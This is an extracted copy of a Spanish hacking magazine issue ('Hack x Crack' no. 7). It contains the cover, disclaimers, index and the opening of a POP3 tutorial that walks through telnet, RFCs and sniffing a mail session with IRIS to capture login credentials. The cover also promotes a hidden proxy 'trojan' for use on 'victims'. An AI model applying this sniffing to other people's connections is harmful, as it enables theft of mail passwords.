SlideShare una empresa de Scribd logo
PC
                       HACK X CRACK: CCPROXY -- UTILIZA A TUS VÍCTIMAS !!!

                                                                         P
                                                                         A
                                                                         S
                                                                         O
                      P A S Oa
                             a
                             a
                             a
                             a
                             a
                             a
                             aa
                              a
                              a
                              a
                              a
                              a
                                             CONSIGUE UNA
                                             CUENTA POP3                     LOS CUADERNOS DE
HACK X CRACK - HACK X CRACK - HACK X CRACK




                                                                             HACK
                                                                                                      CRACK
                                                                             www.hackxcrack.com

                                               GRATIS :)


                                              CURSO DE VISUAL BASIC                El Cuarto Troyano de
                                                 SEGUNDA ENTREGA !!                  de Hack x Crack:
                                              Accede por TELNET
                                              a Servidores POP3                        EL CCPROXY
                                                                                   Un Servidor Proxy Oculto para
                                                                                  Anonimizar nuestras Conexiones

                                                                                                IPHXC (SEGUNDA PARTE)
                                                                                               NUESTRO TERCER TROYANO
                                               Entendiendo los
                                                 Protocolos                                  La Inseguridad del Protocolo
                                                                                             POP3: Capturando las Claves
                                              RIPPEANDO (2ª parte):                          de nuestra Cuenta de Correo
                                                   EL AUDIO
                                                AC3 -- MP3 -- OGG

                                              Nº 7 -- P.V.P. 4,5 EUROS       Los Primeros Pasos con
                                                                                      IRIS RED)
                                                                 00007




                                                                                (SNIFFANDO LA
                                               8 414090 202756




                                             APRENDE CON NOSOTROS LO QUE NADIE SE ATREVE A ENSEÑAR
PC
                            P
                            P
                            A
                            A
                                     LOS CUADERNOS DE
                            S
                            S        HACK
                            O
                            O
                                                                   CRACK
   P A S O aa
   P A S Oaa                         www.hackxcrack.com
           a
           a
           a
           a
           a
           a
           aa
            a
            a
            a
            a
            a
            a
            a
            aa
             a
             a
             a
             a




EDITORIAL: EDITOTRANS S.L.            Director de la Publicación
C.I.F:     B43675701                  J. Sentís

                                      E-mail
Director Editorial                    director@hackxcrack.com
I. SENTIS
                                      Diseño gráfico:
E-mail contacto                       J. M. Velasco
director@editotrans.com
                                      Contacto diseñador gráfico
Título de la publicación              grafico@hackxcrack.com
Los Cuadernos de HACK X CRACK.
                                      Redactores
Nombre Comercial de la publicacíón    AZIMUT, ROTEADO, FASTIC, MORDEA, FAUSTO,
PC PASO A PASO                        ENTROPIC, MEIDOR, HASHIMUIRA, BACKBONE,
                                      ZORTEMIUS, AK22, DORKAN, KMORK, MAILA,
Web                                   TITINA, SIMPSIM... ... ... ... ...
www.hackxcrack.com
                                      Contacto redactores
Deposito legal:      B.26805-2002     redactores@hackxcrack.com
Código EAN:          8414090202756
Código ISSN:         En proceso       Colaboradores
                                      Mas de 130 personas: de España, de Brasil, de
                                      Argentina, de Francia, de Alemania de Japón y
                                      algún Estadounidense.

                                      Contacto colaboradores
                                      colaboradores@hackxcrack.com

                                      Imprime
                                      I.G. PRINTONE S.A. Tel 91 808 50 15

                                      Distribución
                                      Coedis S.L. Avda. de Barcelona 225. Molins de Rei.
                                      Barcelona. Tel 93 680 03 60 FAX 93 668 82 59
                                      WEB: www.coedis.com (mapa de distribución en la
                                      web)

                                      © Copyright Editotrans S.L.
                                      NUMERO 7 -- PRINTED IN SPAIN
                                      PERIOCIDAD MENSUAL

Página 2                                                           PC PASO A PASO Nº 6
DECLARACION DE INTENCIONES
PARA "LOS OTROS":

1.- La intención de la presente publicación NO ES fomentar la piratería           curiosidad deberéis ponerla VOSOTROS, porque los medios los facilitaremos
informática ni la “delincuencia” en la Red.                                       NOSOTROS. En las siguientes líneas os descubrimos cómo podremos
2.- Cualquier texto publicado es VALIDADO por nuestra Asesoría Jurídica,          conseguir nuestros objetivos y definimos algunas de las palabras que más
por lo que advertimos a cualquier persona, empresa u organización de la           han sido violadas y retorcidas en su significado.
inutilidad de cualquier iniciativa jurídica en nuestra contra. Aun así, en caso
de cualquier iniciativa en contra de esta revista, deberá ser debidamente         Hacker: Este término ha sufrido a lo largo de su corta historia una horrible
presentada y resuelta en la Razón Social que figura en nuestros documentos        conspiración perpetrada por la ignorancia de los medios, eso que
de constitución.                                                                  personalmente llamo "periodismo de telediario" (en clara alusión a los
3.- Esta publicación no se hace responsable del mal uso de los conocimientos      ridículos artículos que no hacen mas que intoxicar nuestra percepción de
que se exponen.                                                                   las cosas e insultar nuestra inteligencia). Ese tipo de periodismo unido a
4.- Esta publicación NO FACILITARÁ los datos de nuestros colaboradores            "otros poderes", desde los monopolios que deben justificar su incompetencia
ni el origen de nuestros conocimientos salvo ORDEN JUDICIAL y, aun así,           hasta los gobiernos que deben justificar sus intereses ocultos pasando por
advertimos que algunos de esos colaboradores NO SON CONOCIDOS mas                 la industria del cine (normalmente demonológica) y los medios informativos
que por sus NICKS (alias). Por ello, correrá a cargo de los organismos            "de masas".
pertinentes su “descubrimiento”.
5.- Esta publicación NO SE HACE RESPONSABLE ni tienen por qué COMPARTIR           Pues bien, HACKER no es mas que una persona que posee conocimientos
las opiniones personales vertidas por sus colaboradores, por lo que NO            avanzados sobre una materia en concreto, normalmente relacionados con
SOMOS RESPONSABLES de las mismas.                                                 la tecnología aunque ni mucho menos limitado a ello. Ponen sus aptitudes
6.- Cualquier texto publicado estará bajo las protecciones de DERECHOS            al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el
DE AUTOR y no se permite su copia, publicación, modificación o distribución       funcionamiento de "las cosas" y no encuentran límites en sus camino mas
sin antes obtener el permiso de esta editorial. De este punto quedan exentos      que su propia curiosidad. No se dedican a destruir ni a causar estragos
aquellos textos que han sido obtenidos de terceros y/o que están sujetos          entre sus "victimas", no se dedican a robar ni a chantajear ni a regodearse
a otras licencias (ya sean por parte de su autor o por terceros).                 de sus "conquistas", muy al contrario suelen advertir a terceros de las
7.- Si desean ponerse en contacto con nuestro departamento jurídico,              debilidades de sus sistemas y, desgraciadamente, esos "terceros" en lugar
rogamos enviar mail a juridico@hackxcrack.com                                     de agradecerles su aviso se dedican a denunciarlos o perseguirlos… aunque
                                                                                  no siempre es así, por supuesto, muchas compañías y gobiernos han
PARA NUESTROS LECTORES:                                                           aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores
                                                                                  (o empleados) de estos. BILL GATES es un HACKER (el papá ventanas),
Como podréis ver, esta no es una revista mas, por primera vez tenéis ante         como Linus Torvalds (el papá Linux) o Grace Hooper (la Almirante,
vosotros una publicación LIBRE que os ofrecerá la posibilidad de explorar         creadora del Lenguaje COBOL), los autores del COREWAR Robert Thomas
la red tal y como debe explorarse ;)                                              Morris, Douglas McIlroy y Victor Vysottsky (precursores de los
                                                                                  creadores de virus informáticos), Fred Cohen (el primer investigador y
Esta publicación responde a la pregunta mas veces expuesta en LA RED:             autor de los virus de la historia), Dennis Ritchie y Ken Thompson
¿Como puedo ser un hacker? Bien, ahora seguro que muchos ya se están              ("hacedores" del Lenguaje C y co-creadores del SO UNIX), Gary Kildall
"sonriendo" y pensando lo ilusos que somos al intentar "eregirnos" en             (autor del sistema operativo CMP y CPM/86), Tim Paterson (autor del
"portadores de LA LUZ", pensando que seremos una "escuela de lamers"              Quick & Dirty DOS), Morris (autor de "The tour of the Worm"), Kevin
y similares a otras publicaciones que, entre sus 100 páginas de revista solo      Mitnick (el más buscado por el FBI), Phiber Optik (líder juvenil convertido
contiene 5 de "material utilizable" (si es que puede llamarse así).               en símbolo de los hackers), Richard Stallman (impulsor del "software
                                                                                  gratuito" y GNU), Johan Helsingius (primer conductor de un Remailer
Pues NO, lo siento, vosotros seréis nuestros jueces y, llegado el caso,           Anónimo), Chen Ing-Hou (autor del virus CIH -Chernobyl- ), Sir Dyistic
NUESTROS VERDUGOS.                                                                 (creadorutor del Back Orifice), David L. Smith (virus Melissa), Reonel
                                                                                  Ramonez (virus LoveLetter), Vladimir Levin (Robó electrónicamente
Nuestro objetivo es: ACABAR CON LA BASURA DE LA RED (lamers y demás               10 millones de dólares al Citibank), y muchos mas. ¿Cómo? ¿Pero no hemos
"esencias") con el único método que conocemos: LA EDUCACIÓN y con un              dicho que los hackers no comenten delitos? Pues NO, vuelve a leer su
única bandera que será por siempre nuestra firma: SOLO EL CONOCIMIENTO            definición… pero claro, de todo hay en la viña del señor, y al igual que hay
TE HACE LIBRE
         LIBRE.                                                                   delincuentes entre el clero hay hackers que en un momento u otro han
                                                                                  ·caido· en la ilegalidad, nadie es perfecto!!!!! … y Bill Gates es un HACKER?
Estos son nuestros pilares: LA EDUCACIÓN Y EL CONOCIMIENTO Para ser
                                                CONOCIMIENTO.                     Por supuesto, solo tienes que leerte su biografía. ¿Sorprendido? Espero
un HACKER (maldita palabra mal entendida por unos y peor utilizada por            que no, porque eso no es nada mas que un cero a la izquierda en comparación
otros) solo hace falta dos cosas: curiosidad y medios, a partir de ahora la       con lo que vas a encontrar en esta revista.
EDITORIAL:
                  EL DIRECTOR SUSTITUTO



Nuestro director ha estado de baja durante las
últimas semanas y seguirá estándolo por unas




                                                     INDICE
cuantas más, así que le ha tocado al presente,
AZIMUT, hacer de “director sustituto”.

Ahora mismo son las 7:00 de la mañana y dentro
de una hora tengo que tener lista la Revista para
entregarla a la Imprenta, ha sido realmente          3 DECLARACION DE INTENCIONES
complicado que este número vea la luz, una carrera
                                                     4 EDITORIAL
contra todo (tiempo, recursos, fuerzas, horas sin
dormir... ...)                                       5 PROTOCOLOS Y SU SEGURIDAD: POP3

                                                     18 CONCURSO SUSE LINUX
No me entretendré mucho, simplemente espero
que este número sea del gusto de la mayoría y        19   PASA    TUS   PELICULAS   A   DIVX   III   EL   AUDIO

tenga el menor número de errores posible dadas       24SUSCRIPCIONES
las circunstancias.
                                                     25 PASA TUS PELICULAS A DIVX IV MULTIPLEXANDO

Doy las gracias a todos los que han colaborado       29   CURSO    DE   VISUAL   BASIC:   LA   CALCULADORA
conmigo para que PC PASO A PASO 7 esté hoy en
                                                     37 BAJATE LOS LOGOS DE PC PASO A PASO (HXC)
tus manos y en especial a la paciencia que la
mayoría han demostrado en el foro, puesto que        38   IPHXC: EL TERCER TROYANO DE HXC II
últimamente no puedo ni postear.
                                                     47 COLABORA CON NOSOTROS

Desde aquí, pido disculpas a muchos colaboradores    48 APACHE: UNSERVIDOR WEB EN EL PC
a quienes no he podido responder sus mails, en
                                                     57 SERVIDOR DE HXC. MODO DE EMPLEO
cuanto deje la revista en la imprenta me meteré
en ello.                                             58 CCPROXY: EL Iv TROYANO DE PC PASO A PASO

                                                     66 GANADOR DEL CONCURSO SUSE LINUX
Resumiendo, gracias a todos por leernos,
aguantarnos y criticarnos :p                         67 NUMEROS ATRASADOS


Un ABRAZO muy FUERTE !!!
SERIE RAW: CONOCIENDO
         PROTOCOLOS Y SU SEGURIDAD.
                RAW1 pOP3
                   (protocolo de recepcion de correo electronico)



                       -Aprenderemos a encontrar información sobre protocolos (RFCs)
                           -Aprenderemos a instalar y manejar rápidamente un sniffer
                            - Obtendremos una Cuenta POP3 GRATUITA y REDIRECCIONABLE
                       - Investigaremos el funcionamiento del POP3, uno de los protocolos
                                      más empleados en la recepción de emails.
                              - Capturaremos las CLAVES de acceso de una sesión POP3
                                    - Empezaremos a perderle el miedo al TELNET
                                                 - Y mucho más :)


          1.-   EL   PROCESO                           DE       Por supuesto, además de esta finalidad tan
          INVESTIGACIÓN                                         poética, tenemos también otras muchas
                                                                aplicaciones más "prácticas", como ya se verá
          1.1. LA FILOSOFÍA DE LA SERIE RAW                     en otros artículos como el que me motivó a
                                                                iniciar esta serie, o en el apartado final de este
          Al ser éste el primer artículo de la serie, tendré    artículo, que saca unas cuantas conclusiones
          que esmerarme aquí un poco más para dejar             relacionadas con la seguridad en POP3.
          claros unos cuantos conceptos.                        Si nuestro cliente de correo (ya sea un cliente
          Lo que se pretende conseguir con esta serie           de correo respetable, o Outlook) es capaz de
          es una comprensión en profundidad del                 conectarse a un servidor de correo y enviar y
          funcionamiento de los protocolos que funcionan        recibir mensajes, ¿por qué no vamos a poder
          sobre TCP/IP, y que utilizamos a diario en            hacerlo nosotros? ¡Hurguemos en las tripas de
          Internet (http, ftp, pop3, smtp, irc, ...).           los clientes de correo hasta que seamos capaces
          Al igual que el castellano o el inglés son            de sustituirles! :-D
          lenguajes pensados para ser utilizados                Evidentemente, aunque conozcamos en detalle
          directamente por el ser humano, los protocolos        el funcionamiento de estos protocolos, no nos
          que utilizamos en Internet (o en nuestra red          bastará con dibujar un círculo en el suelo y
          local) han sido pensados para ser usados              vocalizar con voz profunda los comandos que
          directamente por las máquinas en sus                  hemos de enviar al servidor, si no que
          comunicaciones, y no directamente por el ser          necesitaremos siempre alguna herramienta
          humano. Pero esto no impide que unas mentes           básica que nos permita establecer una conexión
          enfermas como las nuestras utilicen también           con el servidor (de correo en este caso) y
          estos protocolos aún sin ser máquinas. :-)            enviarle los comandos, así como poder leer
          ¿Y cual es el fin de esto? Pues el fin principal      sus respuestas a los mismos. Para ello
          es, sin duda, el ansia de saber cómo funcionan        podemos utilizar, por ejemplo, un cliente
          las cosas, en lugar de limitarnos a utilizarlas.      de Telnet cualquiera. Esto será así para
          Es decir, el sustituir nuestra idea de los enanitos   toda la serie. :-)
          transportando paquetes de datos, por conceptos        Por si no lo sabéis, cualquier sistema operativo
          claros del funcionamiento real de las cosas.          trae su propio cliente de Telnet, por lo que

PC PASO A PASO Nº 7                                                                                                  Página 5
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




             basta que desde una consola (ya sea una shell   con lo que obtendremos directamente una
            de Linux/Unix, o una ventana MS-DOS en           ventana de comandos donde se está ejecutando
            Windows) escribas "telnet" y pulses enter para   nuestro teltet en modo texto.
            que se abra la aplicación de Telnet de vuestro
            sistema.                                         Si nunca has abierto un Cliente Telnet, debes
                                                             estar preguntándote qué es lo que tienes delante
                                                             de tus ojos a parte de una insípida e indescifrable
  !            Ya hemos explicado...
                                                             ventana negra… pues aunque no lo parezca,
                                                             tienes ante ti una herramienta que te permite
  Ya hemos explicado mil veces cómo abrir una Ventana de
                                                             conectarte a cualquier servidor y… bueno, mejor
  Comandos (o Shell, o Ventana MS-DOS, llámalo como
                                                             sigue leyendo y lo verás por ti mismo.
  quieras) desde Windows, consulta los anteriores números
                                                             Antes de continuar, vamos a familiarizarnos un
  que es muy fácil (para Windows XP: Menu Inicio -->
                                                             poco con nuestro nuevo juguete. Lo primero,
  Ejecutar y escribimos cmd.exe)
                                                             como siempre, es pedir ayuda escribiendo un
                                                             interrogante y pulsando enter (con esto
                                                             accedemos a la ayuda del própio programa)
            Otra forma de abrir el telnet (en Windows
            2000/XP) es ejecutarlo directamente. Vamos
            al Menu Inicio --> ejecutar, escribimos telnet
            y pulsamos aceptar




                                                             Aunque al principio todo esto no te suene de
                                                             nada, leete las opciones un par de veces.
                                                             Ummm, hay una interesante puesto que nos
                                                             ofrece más información: display, pues venga,
                                                             escribe display y pulsa enter




Página 6                                                                                           PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




          Aquí hay una información MUY IMPORTANTES
          que es "Eco local deshabilitado". Cuando              !            No cierres...
          estemos conectados a un servidor (en este
          caso nos conectaremos a un servidor de mail
                                                                NO CIERRES ESTA VENTANA TELNET, que después
          tipo POP3), nosotros le enviaremos comandos
                                                                la utilizaremos :)
          a ese servidor remoto y él nos contestará; si
          tenemos deshabilitado el ECO, nuestros
          comandsos NO APARECERÁN en la pantalla,
          por lo tanto es muy recomendable activarlo.        1.2. DOCUMENTACIÓN
          ¿Cómo lo activamos? Pues muy sencillo, fíjate      Pero, ¿por dónde empezamos? ¿Cómo voy a
          en la pantalla anterior (donde vimos el comando    saber yo lo que hace mi cliente de correo? Yo
          display) y vemos otro comando interesante:         sólo veo una ventana con un botón muy grande
          "set", que nos ofrece entre otras cosas la         que pone ENVIAR y muchas cosas más. ¿Cómo
          posibilidad "set ?" (esto nos mostrará una lista   puedo saber lo que hace cuando le doy a esos
          de opciones para este comando). Venga, escribe     botones? Lo que voy a explicar aquí son
          "set ?" (sin comillas, por favor) y pulsa enter.   precisamente las dos formas que tenemos de
                                                             averiguar el funcionamiento interno de estas
                                                             aplicaciones.

                                                             La primera opción es documentarse ya que,
                                                             por suerte, hay a disposición de todo el mundo
                                                             documentación completa y detallada de todos
                                                             los protocolos utilizados en Internet. Toda la
                                                             documentación oficial de protocolos de Internet
                                                             se encuentra reunida en los llamados RFCs
                                                             (Request For Comments), a los cuales se
                                                             puede acceder sin ningún problema desde, por
                                                             ejemplo, www.rfc-editor.org.

                                                             Ahí tenemos la base de datos oficial de
                                                             documentos RFC. Desde esta web podemos ir
                                                             a la opción RFC SEARCH y escribir, en el caso
                                                             concreto de este documento, que trata sobre
                                                             POP3, pues lo que queremos buscar: "POP3".
          Podemos ver la opción "localecho" (habilita eco    Cada una de las entradas que aparecen tras la
          local). Pues esa es la opción que deseamos :)      búsqueda es un documento RFC que podemos
          Recuerda que estas son opciones del comando        leer directamente desde aquí. :-)
          set, por lo tanto escribe "set localecho" (sin     Es importante que nos fijemos en el campo
          comillas) y pulsa enter. Veremos que obtenemos     "More Info (Obs&Upd)", donde nos indican si
          un mensaje de confirmación.                        este documento está obsoleto, si ha convertido
                                      Al resto de            en obsoleto algún otro, o si algún otro
                                      opciones del           documento complementa el tema con más
                                      comando set, dales     detalles.
                                      un vistazo para que
                                      empiecen          a    Por ejemplo, para nuestra búsqueda de POP3,
                                      sonarte                tenemos la siguiente tabla de resultados:

PC PASO A PASO Nº 7                                                                                            Página 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




                                                                                  Aquí vemos que el
                                                                                  RFC1939 es el documento
                                                                                  que      contiene       la
                                                                                  especificación general del
                                                                                  protocolo POP3, pero que
                                                                                  esta información es
                                                                                  ampliada       por    los
                                                                                  documentos RFC1957, y
                                                                                  RFC2449. Vemos que el
                                                                                  RFC1734 nos da además
                                                                                  información sobre el
                                                                                  mecanismo de autenticación
                                                                                  de POP3.
                                                                                  Lo lógico en este caso es
                                                                                  empezar leyendo el
                                                                                  RFC1939. Lo más probable
                                                                                  es que encontremos en él

           todo lo que necesitamos, pero si por cualquier motivo necesitásemos ampliar información, ya
           sabemos dónde hacerlo.
           Si lo tuyo no es el inglés, puedes probar suerte en el grupo de traducción de RFCs al
           castellano, en http://www.rfc-es.org/ , aunque me temo que de momento los documentos traducidos
           son muy pocos y, además, un consejo personal, nunca leáis un documento técnico en una lengua
           que no sea la original. ;-)
           Los RFCs al principio pueden dar un poco de miedo, pero en general suelen ser fáciles y rápidos
           de leer para una persona con unos mínimos conocimientos básicos. En caso de que no podáis
           con ellos, siempre podéis utilizar al omnisciente Google para encontrar algún documento más
           orientado al público mortal. :-)
           Si, aún así, lo vuestro sigue sin ser la documentación técnica, todavía os quedan dos opciones
           más. La primera, leer el siguiente punto, y la segunda, por supuesto, seguir todos los números
           de esta revista, que te lo da ya todo masticado. ;-D

           1.3. AIREINEGNI
           Existen básicamente dos formas de hacer las cosas: por las buenas, y por las malas.
           Por mucho que ciertas "entidades" intenten esforzarse en ocultarnos el funcionamiento de las
           cosas, siempre habrá alguien suficientemente curioso y suficientemente inteligente como para
           hurgar hasta dar con la solución. En eso consiste precisamente la Ingeniería Inversa (o Aireinegni,
           como me gusta a mi llamarla). :-)
           Imagínate que te compras una calculadora y, ya que la has pagado y es tuya, quieres saber cómo
           funciona. En vista de que no encuentras ninguna información al respecto en los manuales ni
           en ningún otro lugar, no te queda más remedio que coger un destornillador y abrirla para ver
           que hay dentro. Pero... ¡mierda! ¡No tiene tornillos! Los japoneses se han propuesto esta vez
           evitar a toda costa que descubras cómo funciona su cacharro. ¡Pero no podrán contigo! Vas a
           por la sierra mecánica y cortas cuidadosamente la carcasa de la calculadora y... ¡Oh, sorpresa!
           descubres que en su interior hay 27 japoneses acondroplásicos sacando numeritos de unas cajas
           de cartón. Ahora ya sabes cómo funciona tu flamante calculadora :-) (eso si, ahora a ver como


Página 8                                                                                          PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




          vuelves a cerrar la carcasa para que no se         1.3.1. CAPTURA DE UNA SESIÓN POP3
          caigan los enanitos).                              CON EL SNIFFER IRIS
          Por tanto, la ingeniería inversa consiste en       Vamos a ver un ejemplo concreto de esto. Ya
          hurgar en el interior de las cosas hasta deducir   que el espacio para mi artículo es reducido, he
          cómo están hechas y cómo funcionan.                escogido un sniffer muy sencillo, que es el IRIS,
          La ingeniería inversa es la base del cracking      para ver de forma rápida, y sin entrar en
          (el arte/ciencia de desproteger las copias de      detalle, cómo hacer una captura de una sesión
          software), pero ha sido también ampliamente        completa (en este caso, una sesión POP3).
          utilizada en temas de redes, como el que nos       Utilizaré Iris 1.0, a pesar de que hay ya una
          ocupa a nosotros en estos momentos. Un             versión 4.0.5, ya que para lo que vamos a
          ejemplo típico es el de Samba, que implementa      hacer nos sirve cualquier versión.
          el protocolo SMB de Microsoft (el famoso
          NetBios de Windows) sobre plataformas
          Unix/Linux, y que fue desarrollado mediante
                                                                 !            En nuestra Web...
          ingeniería inversa.
          Pero... ¿de qué me sirve a mi esto para mi             En nuestra Web (www.hackxcrack.com) encontrarás la
          misión actual, que es saber cómo funciona el           versión 4.0.5 del IRIS. De paso puedes mirarte la página
          protocolo POP3? ¿Cómo puedo hacer ingeniería           oficial de programa, que nunca viene mal ;)
          inversa para conocer un protocolo? Pues para           (http://www.eeye.com)
          eso tenemos una herramienta que espero que
          conozcáis, que es un sniffer. Un sniffer es
          básicamente una aplicación que nos muestra         No pretendo dar un cursillo de manejo de IRIS,
           los datos que circulan a través de nuestra        por lo que iremos directamente al grano.
          conexión de red.                                   Suponiendo que habéis instalado y configurado
          Cada vez que utilizamos nuestro cliente de         IRIS correctamente (no tiene más misterio que
          correo para recibir correo, estaremos              seleccionar vuestra tarjeta de red), voy a dar
          estableciendo una conexión con un servidor         una serie de pasos para capturar la sesión
          y enviándole una serie de comandos                 POP3:
          para realizar esta tarea. Como el sniffer
          captura todo el tráfico que circula a              1.3.1.1. Configuración del filtro
          través de nuestras conexiones, capturará           Supongo que, igual que yo, y que cualquier
          también todo el tráfico correspondiente            otro flipado de la informática (llámalo geek, si
          a la conexión con ese servidor gracias             lo prefieres), en tu PC habrá ahora mismo
          al cual recibimos nuestro correo. Si               corriendo un cliente de IRC, 4 clientes de FTP,
          configuramos correctamente nuestro                 un navegador, un servidor FTP, etc, etc. En
          sniffer para que filtre todos los datos            resumen, que como te pongas a capturar el
          que captura y nos muestre sólo los referentes      tráfico de tu red va a aparecer ahí desde las
          a esa conexión en concreto, tendremos              conversaciones que tienes con el gordo peludo
          una captura de una sesión completa de              ese que dice ser una preciosa sueca de ojos
          conexión entre nuestro cliente de correo           verdes, hasta los chorizos de bytes que
          y el servidor desde el que recibimos el            componen la foto del bomboncito de la semana.
          correo. Nos bastará ahora con analizar             Por tanto, lo primero que hay que hacer es
          esa captura para deducir el funcionamiento         decirle a IRIS que filtre sólo el tráfico que nos
          del protocolo que utilizan nuestro cliente         interesa. Para eso tenemos en la columna de
          y el servidor para comunicarse. :-)                la izquierda una serie de iconos, que son las


PC PASO A PASO Nº 7                                                                                              Página 9
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




            funciones básicas del programa. Lo que nos
            interesa ahora es el icono Filters. Se nos abrirá
            una ventana para editar la configuración de
            los filtros. Ahí vamos a la pestaña Ports, donde
            podemos hacer un filtrado por puertos. En la
            lista Well Known Ports seleccionamos POP3,
            y aparecerá ahora en la lista Filtered Ports,
            que es donde están los puertos que hemos
            seleccionado para filtrar. Es importante que        A partir de este momento, ya estamos
            esté activada la opción Inclusive ya que, en        capturando. Lógicamente, no veremos nada,
            caso contrario, mostraría todos los puertos         ya que sólo nos mostrará lo que hemos filtrado,
            excepto los escogidos.                              es decir, los datos de las conexiones POP3, y
                                                                de momento no tenemos ninguna conexión
                                                                POP3 establecida.
                                                                Así que este es el momento en el que abrimos
                                                                nuestro cliente de correo y le decimos que
                                                                reciba los mensajes del servidor. Volvemos a
                                                                la ventana de IRIS y... ¡magia! se ha llenado
                                                                de numerajos y letras. :-)

                                                                Una vez que hemos terminado de recibir los
                                                                mensajes, podemos dar a Stop en IRIS. Si no
                                                                le das al STOP, no podrás hacer el Decode en
                                                                el siguiente apartado.

                                                                1.3.1.3. Interpretación
                                                                de la captura
                                                                Se sale por completo de
  !            En la versión...                                 este artículo analizar los
                                                                p a q u e t e s re c i b i d o s ,
  En la versión 4.0.5 del IRIS, cuando pulses sobre filters     aunque os lo recomiendo
  verás la opción EDIT FILTERS. Pulsa sobre ella y verás        como magnífico ejercicio para comprender
  una ventana muy parecida a la anterior. Elimina todos los     perfectamente el protocolo TCP/IP (importante
  puertos de la sección FILTERED PORTS (pulsando el             si hacéis esto que prestéis atención, entre otras
  botón REMOVE ALL *eliminar todos*) y añade el                 cosas, a los Flags del TCP Header), así que
  POP3(110) que lo tienes a la derecha en la sección WELL       nos limitaremos a utilizar una útil herramienta
  KNOWN PORTS *puertos conocidos* -solo tienes que              de IRIS que lo que hace es mostrarnos
  pulsar el mouse dos veces sobre POP3(110)- ;p                 directamente la sesión completa, olvidándonos
                                                                de los detalles de cada paquete.
                                                                De los iconos de la columna de la izquierda
            1.3.1.2. ¡Capturando!                               vamos ahora al icono Decode. Pulsamos ahora
            Para comenzar la captura, basta con pulsar          el icono Decode Buffer Packets, que lo tenemos
            sobre el icono Start/Stop Capture, que es           también en el menú Decode, y nos aparecerá
            el que parece un botón de PLAY (también lo          la sesión que acabamos de capturar (POP3
            tenéis en el menú Capture).                         (110)). Hacemos doble click, y nos aparecerá
                                                                la sesión completa en un formato "legible". Lo


Página 10                                                                                            PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




          que aparece en rojo son las respuestas del        Lee en perfecto Ingés todo el contrato ;p, abajo
          servidor, y en azul los comandos que ha enviado   del todo selecciona las dos casillas y finalmente
          nuestro cliente de correo. Por tanto, ¡lo que     pulsa PROCEED
          aparece en azul es precisamente lo que
          buscábamos! :-D                                   A h o ra u n
                                                            diminuto
                                                            formulario.
                                                            Nosotros
                                                            c o m o
                                                            usuario
                                                            h e m o s
                                                            p u e s t o
                                                            yosoygenial
                                                            y como dominio BonBon.net, así que nuestra
                                                            dirección de mail POP3 gratuita será
                                                            yosoygenial@BonBon.net :) Tu pon lo que
                                                            quieras pero no copies el nuestro o NO PODRÁS
                                                            CREAR la cuenta ;p
                                                            El único punto que te puede hacer dudar es
                                                            eso de Authorization Code (Código de
                                                            Autorización), simplemente escribe ese código
          2. Y AL FIN, EL DICHOSO POP3                      en la casilla inmediatamente inferior Confirm
                                                            Authorization (Confirmar Autorización) y
          ¡Vamos ya a la práctica!                          ya está. Otro punto que quizás (a algunos) les
          Lo primero de todo es, por supuesto, tener        impida crear una cuenta es eso de Reminder
          una cuenta de correo POP3 en cualquier            Question (Pregunta), es una pregunta que
          servidor, ya sea gratuito o de pago. Podéis       te hará el sistema en caso de que olvides tu
          buscar en Google "pop3 gratuito" para encontrar   calve, pues pon una pregunta cualquiera y lo
          cualquier servidor que os de una cuenta POP3.     importante es que en la casilla siguiente
          Bueno, venga, vamos a crear juntos una cuenta     Reminder Answer (Respuesta a la
          POP3 gratuita. Nos vamos por ejemplo a            pregunta anterior) pongas una respuesta
          http://www.hotpop.com/ y nos aparecerá una        SIN DEJAR ESPACIOS EN BLANCO, puesto que
          Web en la cual hay un botón llamado Signup!,      en caso contrario el sistema no lo admitirá
          ya sabes, púlsalo ;)                              como opción válida.




PC PASO A PASO Nº 7                                                                                             Página 11
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




            Todo esto es muy sencillo y me da hasta              mail de Telefónica hubieses utilizado el que
            vergüenza explicarlo, pero bueno, esto es PC         acabamos de crear, solo tendrías que
            PASO A PASO ¿no? ;)                                  redireccionar el correo hacia la nueva cuenta
            Ahora, pulsaremos el botón NEXT (abajo del           de correo de tu nuevo ISP (Proveedor de
            todo) y aparecerá una ventana donde                  Internet), así de sencillo. Bueno, además sirve
            seleccionaremos qué servicio queremos. Solo          para otras cosas, como no dar a nadie tu
            podemos seleccionar una opción, BASIC, la            verdadera dirección de correo; si das la que
            única que es FREE! (gratuita). Pues venga,           acabas de crear, cualquier mail que recibas
            seleccionamos BASIC y pulsamos NEXT.                 puedes redireccionarlo a la TUYA (la que te da
            Ahora nos aparecerá un formulario en que             tu ISP).
            introduciremos los datos que queramos,
            volveremos a pulsar next, rellenaremos otro          Te dejamos que pienses en ello, mientras, como
            formulario, pulsaremos next y llegaremos a           para seguir este texto no necesitamos
            una ventana muy interesante.                         redireccionar nada, pulsaremos sobre "I want
                                                                 to keep my mail on the server and use a POP
                                                                 Client" para empezar de una vez por todas a
                                                                 utilizar nuestra nueva, permanente y gratuita
                                                                 Cuenta POP3 :)




            Hemos seleccionado este proveedor de cuentas
            POP3 precisamente porque te permite hacer
            forwarding, es decir, redireccionar. Esta pantalla
            te explica en perfecto Ingles las ventajas de
            poder redireccionar el correo, soluciona (por
            ejemplo) un problema muy común en España:            Listo!!! Ahora si introduces tu dirección (en
            Imagina que hoy te conectas a Internet               nuestro caso yosoygenial@BonBon.net) y tu
            mediante Terra y dentro de unos meses decides        clave accederás a un menu que te permite
            cambiar de proveedor, el mail de Terra dejará        configurar tu cuenta. Por ahora lo dejaremos
            de existir por mucho que ruegues a Telefónica        tal y como está, pero pulsaremos sobre la
